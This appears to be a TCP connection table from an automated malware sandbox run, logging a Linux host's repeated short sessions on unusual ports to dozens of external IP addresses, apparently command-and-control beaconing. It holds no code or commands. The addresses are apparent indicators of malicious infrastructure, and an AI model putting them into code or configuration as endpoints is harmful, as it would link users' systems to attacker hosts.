Nov 17, 2024 05:38:16.832042933 CET	10732	57478	107.189.8.204	192.168.2.23
Nov 17, 2024 05:38:17.372220039 CET	33644	5940	192.168.2.23	91.149.238.18
Nov 17, 2024 05:38:17.377168894 CET	5940	33644	91.149.238.18	192.168.2.23
Nov 17, 2024 05:38:17.377304077 CET	33644	5940	192.168.2.23	91.149.238.18
Nov 17, 2024 05:38:17.377304077 CET	33644	5940	192.168.2.23	91.149.238.18
Nov 17, 2024 05:38:17.382424116 CET	5940	33644	91.149.238.18	192.168.2.23
Nov 17, 2024 05:38:17.382714987 CET	33644	5940	192.168.2.23	91.149.238.18
Nov 17, 2024 05:38:17.387887001 CET	5940	33644	91.149.238.18	192.168.2.23
Nov 17, 2024 05:38:17.682281017 CET	10732	57478	107.189.8.204	192.168.2.23
Nov 17, 2024 05:38:17.682390928 CET	57478	10732	192.168.2.23	107.189.8.204
Nov 17, 2024 05:38:17.682535887 CET	57478	10732	192.168.2.23	107.189.8.204
Nov 17, 2024 05:38:22.695844889 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:22.700860977 CET	1593	35430	45.147.200.148	192.168.2.23
Nov 17, 2024 05:38:22.701159954 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:22.701210022 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:22.706140995 CET	1593	35430	45.147.200.148	192.168.2.23
Nov 17, 2024 05:38:22.706433058 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:22.711381912 CET	1593	35430	45.147.200.148	192.168.2.23
Nov 17, 2024 05:38:23.775062084 CET	1593	35430	45.147.200.148	192.168.2.23
Nov 17, 2024 05:38:23.775111914 CET	1593	35430	45.147.200.148	192.168.2.23
Nov 17, 2024 05:38:23.775150061 CET	1593	35430	45.147.200.148	192.168.2.23
Nov 17, 2024 05:38:23.775274992 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:23.775274992 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:23.775274992 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:23.775382996 CET	35430	1593	192.168.2.23	45.147.200.148
Nov 17, 2024 05:38:25.302453995 CET	42836	443	192.168.2.23	91.189.91.43
Nov 17, 2024 05:38:25.866271973 CET	5940	33644	91.149.238.18	192.168.2.23
Nov 17, 2024 05:38:25.866400957 CET	33644	5940	192.168.2.23	91.149.238.18
Nov 17, 2024 05:38:25.871387005 CET	5940	33644	91.149.238.18	192.168.2.23
Nov 17, 2024 05:38:29.398087025 CET	42516	80	192.168.2.23	109.202.202.202
Nov 17, 2024 05:38:30.878464937 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:30.883387089 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:30.883441925 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:30.883457899 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:30.888767004 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:30.888813972 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:30.893976927 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:31.851471901 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:31.851532936 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:31.851562023 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:31.854383945 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:31.854441881 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:31.855351925 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:31.855381012 CET	8994	33724	194.87.30.79	192.168.2.23
Nov 17, 2024 05:38:31.855393887 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:31.855422974 CET	33724	8994	192.168.2.23	194.87.30.79
Nov 17, 2024 05:38:38.895004034 CET	38800	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:38.900338888 CET	5859	38800	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:38.900511026 CET	38800	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:38.900511026 CET	38800	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:38.905874968 CET	5859	38800	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:38.906044960 CET	38800	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:38.911514997 CET	5859	38800	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:39.849045992 CET	5859	38800	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:39.849344015 CET	38800	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:39.849344015 CET	38800	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:46.970108986 CET	41734	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:38:46.975476980 CET	21211	41734	27.102.118.110	192.168.2.23
Nov 17, 2024 05:38:46.975604057 CET	41734	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:38:46.975788116 CET	41734	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:38:46.981257915 CET	21211	41734	27.102.118.110	192.168.2.23
Nov 17, 2024 05:38:46.981487989 CET	41734	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:38:46.986757040 CET	21211	41734	27.102.118.110	192.168.2.23
Nov 17, 2024 05:38:48.434942961 CET	21211	41734	27.102.118.110	192.168.2.23
Nov 17, 2024 05:38:48.435308933 CET	41734	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:38:48.435308933 CET	41734	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:38:53.970613003 CET	43928	443	192.168.2.23	91.189.91.42
Nov 17, 2024 05:38:54.891983032 CET	38804	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:54.897208929 CET	5859	38804	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:54.897435904 CET	38804	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:54.897522926 CET	38804	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:54.902487993 CET	5859	38804	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:54.902600050 CET	38804	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:54.907495022 CET	5859	38804	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:55.848670959 CET	5859	38804	194.58.66.244	192.168.2.23
Nov 17, 2024 05:38:55.848910093 CET	38804	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:38:55.848989964 CET	38804	5859	192.168.2.23	194.58.66.244
Nov 17, 2024 05:39:03.476090908 CET	41738	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:39:03.481726885 CET	21211	41738	27.102.118.110	192.168.2.23
Nov 17, 2024 05:39:03.481869936 CET	41738	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:39:03.482002020 CET	41738	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:39:03.487181902 CET	21211	41738	27.102.118.110	192.168.2.23
Nov 17, 2024 05:39:03.487584114 CET	41738	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:39:03.492659092 CET	21211	41738	27.102.118.110	192.168.2.23
Nov 17, 2024 05:39:05.094460964 CET	21211	41738	27.102.118.110	192.168.2.23
Nov 17, 2024 05:39:05.095148087 CET	41738	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:39:05.095149040 CET	41738	21211	192.168.2.23	27.102.118.110
Nov 17, 2024 05:39:05.950496912 CET	48800	19943	192.168.2.23	31.13.248.13
Nov 17, 2024 05:39:05.955581903 CET	19943	48800	31.13.248.13	192.168.2.23
Nov 17, 2024 05:39:05.955682039 CET	48800	19943	192.168.2.23	31.13.248.13
Nov 17, 2024 05:39:05.955722094 CET	48800	19943	192.168.2.23	31.13.248.13
Nov 17, 2024 05:39:05.960722923 CET	19943	48800	31.13.248.13	192.168.2.23
Nov 17, 2024 05:39:05.960807085 CET	48800	19943	192.168.2.23	31.13.248.13
Nov 17, 2024 05:39:05.965912104 CET	19943	48800	31.13.248.13	192.168.2.23
Nov 17, 2024 05:39:06.952229977 CET	19943	48800	31.13.248.13	192.168.2.23
Nov 17, 2024 05:39:06.952764988 CET	48800	19943	192.168.2.23	31.13.248.13
Nov 17, 2024 05:39:06.952764988 CET	48800	19943	192.168.2.23	31.13.248.13
Nov 17, 2024 05:39:11.991673946 CET	54762	17443	192.168.2.23	5.39.254.71
Nov 17, 2024 05:39:11.997230053 CET	17443	54762	5.39.254.71	192.168.2.23
Nov 17, 2024 05:39:11.997591972 CET	54762	17443	192.168.2.23	5.39.254.71
Nov 17, 2024 05:39:11.997591972 CET	54762	17443	192.168.2.23	5.39.254.71
Nov 17, 2024 05:39:12.003144026 CET	17443	54762	5.39.254.71	192.168.2.23
Nov 17, 2024 05:39:12.003463984 CET	54762	17443	192.168.2.23	5.39.254.71
Nov 17, 2024 05:39:12.010181904 CET	17443	54762	5.39.254.71	192.168.2.23
Nov 17, 2024 05:39:12.871428013 CET	17443	54762	5.39.254.71	192.168.2.23
Nov 17, 2024 05:39:12.871903896 CET	54762	17443	192.168.2.23	5.39.254.71
Nov 17, 2024 05:39:12.872009039 CET	54762	17443	192.168.2.23	5.39.254.71
Nov 17, 2024 05:39:15.199299097 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:15.204854965 CET	9805	35914	107.189.8.204	192.168.2.23
Nov 17, 2024 05:39:15.205184937 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:15.205389023 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:15.210617065 CET	9805	35914	107.189.8.204	192.168.2.23
Nov 17, 2024 05:39:15.211013079 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:15.217187881 CET	9805	35914	107.189.8.204	192.168.2.23
Nov 17, 2024 05:39:16.077708006 CET	9805	35914	107.189.8.204	192.168.2.23
Nov 17, 2024 05:39:16.077771902 CET	9805	35914	107.189.8.204	192.168.2.23
Nov 17, 2024 05:39:16.078313112 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:16.078313112 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:16.078313112 CET	35914	9805	192.168.2.23	107.189.8.204
Nov 17, 2024 05:39:17.971291065 CET	60298	6968	192.168.2.23	31.13.248.89
Nov 17, 2024 05:39:17.976752043 CET	6968	60298	31.13.248.89	192.168.2.23
Nov 17, 2024 05:39:17.977147102 CET	60298	6968	192.168.2.23	31.13.248.89
Nov 17, 2024 05:39:17.977250099 CET	60298	6968	192.168.2.23	31.13.248.89
Nov 17, 2024 05:39:17.982929945 CET	6968	60298	31.13.248.89	192.168.2.23
Nov 17, 2024 05:39:17.983346939 CET	60298	6968	192.168.2.23	31.13.248.89
Nov 17, 2024 05:39:17.988811970 CET	6968	60298	31.13.248.89	192.168.2.23
Nov 17, 2024 05:39:21.116704941 CET	48676	7149	192.168.2.23	195.133.53.106
Nov 17, 2024 05:39:21.122351885 CET	7149	48676	195.133.53.106	192.168.2.23
Nov 17, 2024 05:39:21.122749090 CET	48676	7149	192.168.2.23	195.133.53.106
Nov 17, 2024 05:39:21.122853041 CET	48676	7149	192.168.2.23	195.133.53.106
Nov 17, 2024 05:39:21.128948927 CET	7149	48676	195.133.53.106	192.168.2.23
Nov 17, 2024 05:39:21.129442930 CET	48676	7149	192.168.2.23	195.133.53.106
Nov 17, 2024 05:39:21.134996891 CET	7149	48676	195.133.53.106	192.168.2.23
Nov 17, 2024 05:39:22.286694050 CET	7149	48676	195.133.53.106	192.168.2.23
Nov 17, 2024 05:39:22.287245035 CET	48676	7149	192.168.2.23	195.133.53.106
Nov 17, 2024 05:39:22.287245035 CET	48676	7149	192.168.2.23	195.133.53.106
Nov 17, 2024 05:39:26.446707010 CET	6968	60298	31.13.248.89	192.168.2.23
Nov 17, 2024 05:39:26.447060108 CET	60298	6968	192.168.2.23	31.13.248.89
Nov 17, 2024 05:39:26.452212095 CET	6968	60298	31.13.248.89	192.168.2.23
Nov 17, 2024 05:39:27.383995056 CET	53580	20243	192.168.2.23	193.233.193.45
Nov 17, 2024 05:39:27.389219999 CET	20243	53580	193.233.193.45	192.168.2.23
Nov 17, 2024 05:39:27.389447927 CET	53580	20243	192.168.2.23	193.233.193.45
Nov 17, 2024 05:39:27.389517069 CET	53580	20243	192.168.2.23	193.233.193.45
Nov 17, 2024 05:39:27.394714117 CET	20243	53580	193.233.193.45	192.168.2.23
Nov 17, 2024 05:39:27.395070076 CET	53580	20243	192.168.2.23	193.233.193.45
Nov 17, 2024 05:39:27.400182009 CET	20243	53580	193.233.193.45	192.168.2.23
Nov 17, 2024 05:39:31.489278078 CET	41898	5268	192.168.2.23	209.141.49.186
Nov 17, 2024 05:39:31.494298935 CET	5268	41898	209.141.49.186	192.168.2.23
Nov 17, 2024 05:39:31.494544029 CET	41898	5268	192.168.2.23	209.141.49.186
Nov 17, 2024 05:39:31.494791031 CET	41898	5268	192.168.2.23	209.141.49.186
Nov 17, 2024 05:39:31.499624014 CET	5268	41898	209.141.49.186	192.168.2.23
Nov 17, 2024 05:39:31.499883890 CET	41898	5268	192.168.2.23	209.141.49.186
Nov 17, 2024 05:39:31.504960060 CET	5268	41898	209.141.49.186	192.168.2.23
Nov 17, 2024 05:39:35.866625071 CET	20243	53580	193.233.193.45	192.168.2.23
Nov 17, 2024 05:39:35.867084980 CET	53580	20243	192.168.2.23	193.233.193.45
Nov 17, 2024 05:39:35.872188091 CET	20243	53580	193.233.193.45	192.168.2.23
Nov 17, 2024 05:39:39.977566004 CET	5268	41898	209.141.49.186	192.168.2.23
Nov 17, 2024 05:39:39.978526115 CET	41898	5268	192.168.2.23	209.141.49.186
Nov 17, 2024 05:39:39.984088898 CET	5268	41898	209.141.49.186	192.168.2.23
Nov 17, 2024 05:39:40.911670923 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:40.917351961 CET	7894	47098	45.140.168.235	192.168.2.23
Nov 17, 2024 05:39:40.918119907 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:40.918119907 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:40.923940897 CET	7894	47098	45.140.168.235	192.168.2.23
Nov 17, 2024 05:39:40.924536943 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:40.929716110 CET	7894	47098	45.140.168.235	192.168.2.23
Nov 17, 2024 05:39:41.968430042 CET	7894	47098	45.140.168.235	192.168.2.23
Nov 17, 2024 05:39:41.968489885 CET	7894	47098	45.140.168.235	192.168.2.23
Nov 17, 2024 05:39:41.969063044 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:41.969063044 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:41.969063044 CET	47098	7894	192.168.2.23	45.140.168.235
Nov 17, 2024 05:39:45.022689104 CET	42236	22361	192.168.2.23	217.28.130.41
Nov 17, 2024 05:39:45.028249979 CET	22361	42236	217.28.130.41	192.168.2.23
Nov 17, 2024 05:39:45.028830051 CET	42236	22361	192.168.2.23	217.28.130.41
Nov 17, 2024 05:39:45.028830051 CET	42236	22361	192.168.2.23	217.28.130.41
Nov 17, 2024 05:39:45.034421921 CET	22361	42236	217.28.130.41	192.168.2.23
Nov 17, 2024 05:39:45.034842014 CET	42236	22361	192.168.2.23	217.28.130.41
Nov 17, 2024 05:39:45.040586948 CET	22361	42236	217.28.130.41	192.168.2.23
Nov 17, 2024 05:39:47.009336948 CET	43756	22606	192.168.2.23	86.107.100.80
Nov 17, 2024 05:39:47.014839888 CET	22606	43756	86.107.100.80	192.168.2.23
Nov 17, 2024 05:39:47.015120983 CET	43756	22606	192.168.2.23	86.107.100.80
Nov 17, 2024 05:39:47.015427113 CET	43756	22606	192.168.2.23	86.107.100.80
Nov 17, 2024 05:39:47.020592928 CET	22606	43756	86.107.100.80	192.168.2.23
Nov 17, 2024 05:39:47.020677090 CET	43756	22606	192.168.2.23	86.107.100.80
Nov 17, 2024 05:39:47.026153088 CET	22606	43756	86.107.100.80	192.168.2.23
Nov 17, 2024 05:39:49.248538971 CET	22361	42236	217.28.130.41	192.168.2.23
Nov 17, 2024 05:39:49.249420881 CET	42236	22361	192.168.2.23	217.28.130.41
Nov 17, 2024 05:39:49.254978895 CET	22361	42236	217.28.130.41	192.168.2.23
Nov 17, 2024 05:39:54.271421909 CET	41148	19303	192.168.2.23	89.32.41.42
Nov 17, 2024 05:39:54.277343988 CET	19303	41148	89.32.41.42	192.168.2.23
Nov 17, 2024 05:39:54.277781010 CET	41148	19303	192.168.2.23	89.32.41.42
Nov 17, 2024 05:39:54.277781010 CET	41148	19303	192.168.2.23	89.32.41.42
Nov 17, 2024 05:39:54.283066034 CET	19303	41148	89.32.41.42	192.168.2.23
Nov 17, 2024 05:39:54.283371925 CET	41148	19303	192.168.2.23	89.32.41.42
Nov 17, 2024 05:39:54.289057016 CET	19303	41148	89.32.41.42	192.168.2.23
Nov 17, 2024 05:39:55.488727093 CET	22606	43756	86.107.100.80	192.168.2.23
Nov 17, 2024 05:39:55.489587069 CET	43756	22606	192.168.2.23	86.107.100.80
Nov 17, 2024 05:39:55.495352030 CET	22606	43756	86.107.100.80	192.168.2.23
Nov 17, 2024 05:40:00.509413958 CET	54372	19025	192.168.2.23	194.58.66.244
Nov 17, 2024 05:40:00.515144110 CET	19025	54372	194.58.66.244	192.168.2.23
Nov 17, 2024 05:40:00.515464067 CET	54372	19025	192.168.2.23	194.58.66.244
Nov 17, 2024 05:40:00.515810966 CET	54372	19025	192.168.2.23	194.58.66.244
Nov 17, 2024 05:40:00.521155119 CET	19025	54372	194.58.66.244	192.168.2.23
Nov 17, 2024 05:40:00.521473885 CET	54372	19025	192.168.2.23	194.58.66.244
Nov 17, 2024 05:40:00.527127028 CET	19025	54372	194.58.66.244	192.168.2.23
Nov 17, 2024 05:40:01.457634926 CET	19025	54372	194.58.66.244	192.168.2.23
Nov 17, 2024 05:40:01.458354950 CET	54372	19025	192.168.2.23	194.58.66.244
Nov 17, 2024 05:40:01.458355904 CET	54372	19025	192.168.2.23	194.58.66.244
Nov 17, 2024 05:40:02.754324913 CET	19303	41148	89.32.41.42	192.168.2.23
Nov 17, 2024 05:40:02.755177021 CET	41148	19303	192.168.2.23	89.32.41.42
Nov 17, 2024 05:40:02.761308908 CET	19303	41148	89.32.41.42	192.168.2.23
Nov 17, 2024 05:40:06.573515892 CET	47094	19113	192.168.2.23	213.182.204.57
Nov 17, 2024 05:40:06.579265118 CET	19113	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 05:40:06.579623938 CET	47094	19113	192.168.2.23	213.182.204.57
Nov 17, 2024 05:40:06.579623938 CET	47094	19113	192.168.2.23	213.182.204.57
Nov 17, 2024 05:40:06.585264921 CET	19113	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 05:40:06.585696936 CET	47094	19113	192.168.2.23	213.182.204.57
Nov 17, 2024 05:40:06.591285944 CET	19113	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 05:40:07.868715048 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:07.873805046 CET	3806	57666	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:07.873996019 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:07.874037981 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:07.879045010 CET	3806	57666	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:07.879237890 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:07.884290934 CET	3806	57666	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:09.306891918 CET	3806	57666	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:09.307399988 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:09.307400942 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:09.307476997 CET	3806	57666	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:09.307560921 CET	57666	3806	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:15.068316936 CET	19113	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 05:40:15.069149017 CET	47094	19113	192.168.2.23	213.182.204.57
Nov 17, 2024 05:40:15.074760914 CET	19113	47094	213.182.204.57	192.168.2.23
Nov 17, 2024 05:40:19.427259922 CET	35834	2645	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:19.432898045 CET	2645	35834	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:19.433398962 CET	35834	2645	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:19.433525085 CET	35834	2645	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:19.439105034 CET	2645	35834	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:19.439440012 CET	35834	2645	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:19.444993973 CET	2645	35834	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:25.503240108 CET	52482	8375	192.168.2.23	217.28.130.41
Nov 17, 2024 05:40:25.508908033 CET	8375	52482	217.28.130.41	192.168.2.23
Nov 17, 2024 05:40:25.509074926 CET	52482	8375	192.168.2.23	217.28.130.41
Nov 17, 2024 05:40:25.509414911 CET	52482	8375	192.168.2.23	217.28.130.41
Nov 17, 2024 05:40:25.514813900 CET	8375	52482	217.28.130.41	192.168.2.23
Nov 17, 2024 05:40:25.514946938 CET	52482	8375	192.168.2.23	217.28.130.41
Nov 17, 2024 05:40:25.520916939 CET	8375	52482	217.28.130.41	192.168.2.23
Nov 17, 2024 05:40:27.104310036 CET	8375	52482	217.28.130.41	192.168.2.23
Nov 17, 2024 05:40:27.105164051 CET	52482	8375	192.168.2.23	217.28.130.41
Nov 17, 2024 05:40:27.110383987 CET	8375	52482	217.28.130.41	192.168.2.23
Nov 17, 2024 05:40:27.916765928 CET	2645	35834	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:27.917212009 CET	35834	2645	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:27.922786951 CET	2645	35834	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:32.141149998 CET	51560	1919	192.168.2.23	31.13.248.89
Nov 17, 2024 05:40:32.146181107 CET	1919	51560	31.13.248.89	192.168.2.23
Nov 17, 2024 05:40:32.146272898 CET	51560	1919	192.168.2.23	31.13.248.89
Nov 17, 2024 05:40:32.146359921 CET	51560	1919	192.168.2.23	31.13.248.89
Nov 17, 2024 05:40:32.151262045 CET	1919	51560	31.13.248.89	192.168.2.23
Nov 17, 2024 05:40:32.151710987 CET	51560	1919	192.168.2.23	31.13.248.89
Nov 17, 2024 05:40:32.156815052 CET	1919	51560	31.13.248.89	192.168.2.23
Nov 17, 2024 05:40:32.952183008 CET	53870	1919	192.168.2.23	91.149.238.18
Nov 17, 2024 05:40:32.957813025 CET	1919	53870	91.149.238.18	192.168.2.23
Nov 17, 2024 05:40:32.958224058 CET	53870	1919	192.168.2.23	91.149.238.18
Nov 17, 2024 05:40:32.958225012 CET	53870	1919	192.168.2.23	91.149.238.18
Nov 17, 2024 05:40:32.963535070 CET	1919	53870	91.149.238.18	192.168.2.23
Nov 17, 2024 05:40:32.963963032 CET	53870	1919	192.168.2.23	91.149.238.18
Nov 17, 2024 05:40:32.969058037 CET	1919	53870	91.149.238.18	192.168.2.23
Nov 17, 2024 05:40:40.632234097 CET	1919	51560	31.13.248.89	192.168.2.23
Nov 17, 2024 05:40:40.633425951 CET	51560	1919	192.168.2.23	31.13.248.89
Nov 17, 2024 05:40:40.638921022 CET	1919	51560	31.13.248.89	192.168.2.23
Nov 17, 2024 05:40:41.450572968 CET	1919	53870	91.149.238.18	192.168.2.23
Nov 17, 2024 05:40:41.451153994 CET	53870	1919	192.168.2.23	91.149.238.18
Nov 17, 2024 05:40:41.456650972 CET	1919	53870	91.149.238.18	192.168.2.23
Nov 17, 2024 05:40:50.689699888 CET	32980	5448	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:50.695127964 CET	5448	32980	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:50.695589066 CET	32980	5448	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:50.695590019 CET	32980	5448	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:50.701014042 CET	5448	32980	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:50.701244116 CET	32980	5448	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:50.706547976 CET	5448	32980	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:51.507736921 CET	59544	5787	192.168.2.23	209.141.61.182
Nov 17, 2024 05:40:51.513320923 CET	5787	59544	209.141.61.182	192.168.2.23
Nov 17, 2024 05:40:51.513642073 CET	59544	5787	192.168.2.23	209.141.61.182
Nov 17, 2024 05:40:51.513643026 CET	59544	5787	192.168.2.23	209.141.61.182
Nov 17, 2024 05:40:51.519440889 CET	5787	59544	209.141.61.182	192.168.2.23
Nov 17, 2024 05:40:51.519697905 CET	59544	5787	192.168.2.23	209.141.61.182
Nov 17, 2024 05:40:51.525172949 CET	5787	59544	209.141.61.182	192.168.2.23
Nov 17, 2024 05:40:52.146343946 CET	5448	32980	27.102.118.111	192.168.2.23
Nov 17, 2024 05:40:52.146682978 CET	32980	5448	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:52.146682978 CET	32980	5448	192.168.2.23	27.102.118.111
Nov 17, 2024 05:40:52.490442991 CET	5787	59544	209.141.61.182	192.168.2.23
Nov 17, 2024 05:40:52.491075993 CET	59544	5787	192.168.2.23	209.141.61.182
Nov 17, 2024 05:40:52.491075993 CET	59544	5787	192.168.2.23	209.141.61.182
Nov 17, 2024 05:40:57.207479954 CET	60404	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:57.212584019 CET	9559	60404	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:57.212829113 CET	60404	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:57.213165998 CET	60404	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:57.218271971 CET	9559	60404	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:57.218537092 CET	60404	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:40:57.224296093 CET	9559	60404	193.233.193.45	192.168.2.23
Nov 17, 2024 05:40:57.528273106 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:40:57.533540010 CET	9559	41012	194.87.30.79	192.168.2.23
Nov 17, 2024 05:40:57.533936977 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:40:57.534209967 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:40:57.539597988 CET	9559	41012	194.87.30.79	192.168.2.23
Nov 17, 2024 05:40:57.539793015 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:40:57.545268059 CET	9559	41012	194.87.30.79	192.168.2.23
Nov 17, 2024 05:40:58.492942095 CET	9559	41012	194.87.30.79	192.168.2.23
Nov 17, 2024 05:40:58.493004084 CET	9559	41012	194.87.30.79	192.168.2.23
Nov 17, 2024 05:40:58.493534088 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:40:58.493535042 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:40:58.493535042 CET	41012	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:05.689558983 CET	9559	60404	193.233.193.45	192.168.2.23
Nov 17, 2024 05:41:05.690582991 CET	60404	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:41:05.695749998 CET	9559	60404	193.233.193.45	192.168.2.23
Nov 17, 2024 05:41:18.553704977 CET	41014	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:18.559794903 CET	9559	41014	194.87.30.79	192.168.2.23
Nov 17, 2024 05:41:18.560127020 CET	41014	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:18.560231924 CET	41014	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:18.565773010 CET	9559	41014	194.87.30.79	192.168.2.23
Nov 17, 2024 05:41:18.566375017 CET	41014	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:18.572535038 CET	9559	41014	194.87.30.79	192.168.2.23
Nov 17, 2024 05:41:19.538858891 CET	9559	41014	194.87.30.79	192.168.2.23
Nov 17, 2024 05:41:19.539457083 CET	41014	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:19.539457083 CET	41014	9559	192.168.2.23	194.87.30.79
Nov 17, 2024 05:41:25.746829987 CET	60410	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:41:25.752070904 CET	9559	60410	193.233.193.45	192.168.2.23
Nov 17, 2024 05:41:25.752397060 CET	60410	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:41:25.752397060 CET	60410	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:41:25.758152008 CET	9559	60410	193.233.193.45	192.168.2.23
Nov 17, 2024 05:41:25.758492947 CET	60410	9559	192.168.2.23	193.233.193.45
Nov 17, 2024 05:41:25.764303923 CET	9559	60410	193.233.193.45	192.168.2.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
